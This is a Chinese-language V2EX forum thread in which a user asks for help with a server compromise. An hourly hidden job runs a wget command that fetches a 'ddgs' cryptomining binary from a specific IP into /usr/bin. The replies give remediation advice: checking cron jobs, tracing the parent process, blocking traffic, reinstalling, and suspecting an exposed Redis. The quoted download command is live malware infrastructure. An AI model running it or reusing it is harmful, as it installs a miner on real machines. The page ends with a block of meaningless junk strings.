求助,每小时被执行恶意下载挖矿程序 wget -q -T1800 http://103.27.42.76:41933/static/5023/ddgs.x86_64 -O /usr/bin/uvggee 求大佬 - V2EX
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Distributions
Ubuntu
Fedora
CentOS
中文资源站
网易开源镜像站
ying5201314
V2EX    Linux

求助,每小时被执行恶意下载挖矿程序 wget -q -T1800 http://103.27.42.76:41933/static/5023/ddgs.x86_64 -O /usr/bin/uvggee 求大佬

  •  
  •   ying5201314 2020-04-18 11:15:18 +08:00 5485 次点击
    这是一个创建于 2007 天前的主题,其中的信息可能已经有所发展或是发生改变。
    wget -q -T1800 http://103.27.42.76:41933/static/5023/ddgs.x86_64 -O /usr/bin/uvggee
    ip 103.27.42.76 是日本
    每小时执行的恶意命令,如何找到执行的文件在位置,或者是不要他运行,wget 能卸载么
    没有找到定时任务
    27 条回复    2020-04-21 13:40:01 +08:00
    sadwin
        1
    sadwin  
       2020-04-18 11:32:04 +08:00
    有在跑 redis 吗? 有可能是 redis 被黑了
    Hurriance
        2
    Hurriance  
       2020-04-18 11:34:25 +08:00
    redis 上密码
    renmu
        3
    renmu  
       2020-04-18 11:34:25 +08:00 via Android
    cron 里没有?最好的方法就是重装系统
    claysec
        4
    claysec  
       2020-04-18 11:38:40 +08:00
    没有重要东西就直接重装系统。
    sadwin
        5
    sadwin  
       2020-04-18 11:45:14 +08:00
    可以看下这个 t/623847
    GGGG430
        6
    GGGG430  
       2020-04-18 11:45:57 +08:00   1
    首先, cron 分用户的,你切换系统已有用户都试试看 sudo crontab -u userName -l (替换其中的 userName),
    其次可以通过 alias 重命名 wget 为其他命令
    cnzjl
        7
    cnzjl  
       2020-04-18 11:48:23 +08:00
    最近 windows 和 linux 都被挖矿了,一个原因是 redis 公网裸奔,一个是 windows sqlserver 弱口令
    ik
        8
    ik  
       2020-04-18 13:42:34 +08:00 via iPhone   1
    建议重装,想排查问题可以先
    > /usr/bin/uvggee
    chmod 000 /usr/bin/uvggee
    chattr +i /usr/bin/uvggee
    然后再排查问题
    imdong
        9
    imdong  
       2020-04-18 14:23:47 +08:00   2
    非专业,笨笨的方法:

    比如自己写一个 shell 命名为 wget,然后在里面获取一些父进程信息?
    然后用这个 shell 替换(覆盖) wget ??
    won
        10
    won  
       2020-04-18 14:32:35 +08:00   3
    1 top 到进程号
    2 ll 到执行位置
    3 rm 掉
    4 crontab 里删除,并添加一个 1 分钟守护
    5 restart
    i999999
        11
    i999999  
       2020-04-18 15:20:05 +08:00 via Android   1
    建议重装系统,没办法重装的话可以把 wget 和 curl 工具重命名
    guog
        12
    guog  
       2020-04-18 15:23:14 +08:00 via Android   1
    七天了,楼主这个问题还没解决?大家给你的方案你试过了吗
    Rxianbei
        13
    Rxianbei  
       2020-04-18 15:23:47 +08:00 via Android
    @cnzjl 老哥问问你是怎么发现挖矿的。我的 windows 也装了 redis,但是没有公网,装了都大半年了,想来也后怕,请问应该怎么排查?
    ying5201314
        14
    ying5201314  
    OP
       2020-04-18 17:11:32 +08:00
    试过了,主要不能重装,不然早解决
    ying5201314
        15
    ying5201314  
    OP
       2020-04-18 17:16:49 +08:00
    试过了,主要不能重装,不然早解决 1
    @guog
    defunct9
        16
    defunct9  
       2020-04-18 17:28:34 +08:00 via iPhone
    开 ssh,让我上去看看
    xupefei
        17
    xupefei  
       2020-04-18 17:30:06 +08:00 via iPhone
    还有个可能是服务器跑了 yarn 。
    Guys
        18
    Guys  
       2020-04-18 17:51:04 +08:00
    先找到那个程序再进程里面的 pid,先暂停,再顺藤摸瓜,找到老巢去.
    musi
        19
    musi  
       2020-04-18 17:51:28 +08:00
    你在 v2 上发个求 d 帖把那个服务器 d 挂就好了
    xingheng
        20
    xingheng  
       2020-04-18 19:34:05 +08:00
    pstree 找到是哪个主进程启动的 wget,然后删除主进程的执行文件就行了吧。难道还有守护进程??尝试 watch+pstree 。
    patx
        21
    patx  
       2020-04-18 19:43:31 +08:00
    发到全球 ddos 论坛上去
    JustSong
        22
    JustSong  
       2020-04-19 00:21:38 +08:00 via Android
    可以用防火墙进行限制么
    Hades300
        23
    Hades300  
       2020-04-19 07:13:04 +08:00 via Android
    用 iptables drop 包就完事了
    msg7086
        24
    msg7086  
       2020-04-19 17:49:41 +08:00   1
    既然能写入 /usr/bin,那说明别人已经拿到了 root 权限,那从内核到系统文件,所有的程序都可能会被换掉,你不重装难道留着过劳动节么。
    realpg
        25
    realpg  
    PRO
       2020-04-19 22:00:41 +08:00
    我猜你是 centos
    cnzjl
        26
    cnzjl  
       2020-04-20 09:42:08 +08:00
    @Rxianbei 排查下 cup 占用高的进程, 看看有没有可疑的 vbs 脚本,是否为远程下载的脚本~
    zhao305149619
        27
    zhao305149619  
       2020-04-21 13:40:01 +08:00
    这种一般有 cron 的定时脚本,还有就是会有一个低 cpu 利用率的 deamon 的进程不易被发现,所以有时候发现把 cron 停掉之后过一会还是会出现。
    关于     帮助文档     自助推广系统     博客   &bsp; API     FAQ     Solana     3919 人在线   最高记录 6679       Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 25ms UTC 04:13 PVG 12:13 LAX 21:13 JFK 00:13
    Do have faith in what you're doing.
    ubao msn snddm index pchome yahoo rakuten mypaper meadowduck bidyahoo youbao zxmzxm asda bnvcg cvbfg dfscv mmhjk xxddc yybgb zznbn ccubao uaitu acv GXCV ET GDG YH FG BCVB FJFH CBRE CBC GDG ET54 WRWR RWER WREW WRWER RWER SDG EW SF DSFSF fbbs ubao fhd dfg ewr dg df ewwr ewwr et ruyut utut dfg fgd gdfgt etg dfgt dfgd ert4 gd fgg wr 235 wer3 we vsdf sdf gdf ert xcv sdf rwer hfd dfg cvb rwf afb dfh jgh bmn lgh rty gfds cxv xcv xcs vdas fdf fgd cv sdf tert sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf shasha9178 shasha9178 shasha9178 shasha9178 shasha9178 liflif2 liflif2 liflif2 liflif2 liflif2 liblib3 liblib3 liblib3 liblib3 liblib3 zhazha444 zhazha444 zhazha444 zhazha444 zhazha444 dende5 dende denden denden2 denden21 fenfen9 fenf619 fen619 fenfe9 fe619 sdf sdf sdf sdf sdf zhazh90 zhazh0 zhaa50 zha90 zh590 zho zhoz zhozh zhozho zhozho2 lislis lls95 lili95 lils5 liss9 sdf0ty987 sdft876 sdft9876 sdf09876 sd0t9876 sdf0ty98 sdf0976 sdf0ty986 sdf0ty96 sdf0t76 sdf0876 df0ty98 sf0t876 sd0ty76 sdy76 sdf76 sdf0t76 sdf0ty9 sdf0ty98 sdf0ty987 sdf0ty98 sdf6676 sdf876 sd876 sd876 sdf6 sdf6 sdf9876 sdf0t sdf06 sdf0ty9776 sdf0ty9776 sdf0ty76 sdf8876 sdf0t sd6 sdf06 s688876 sd688 sdf86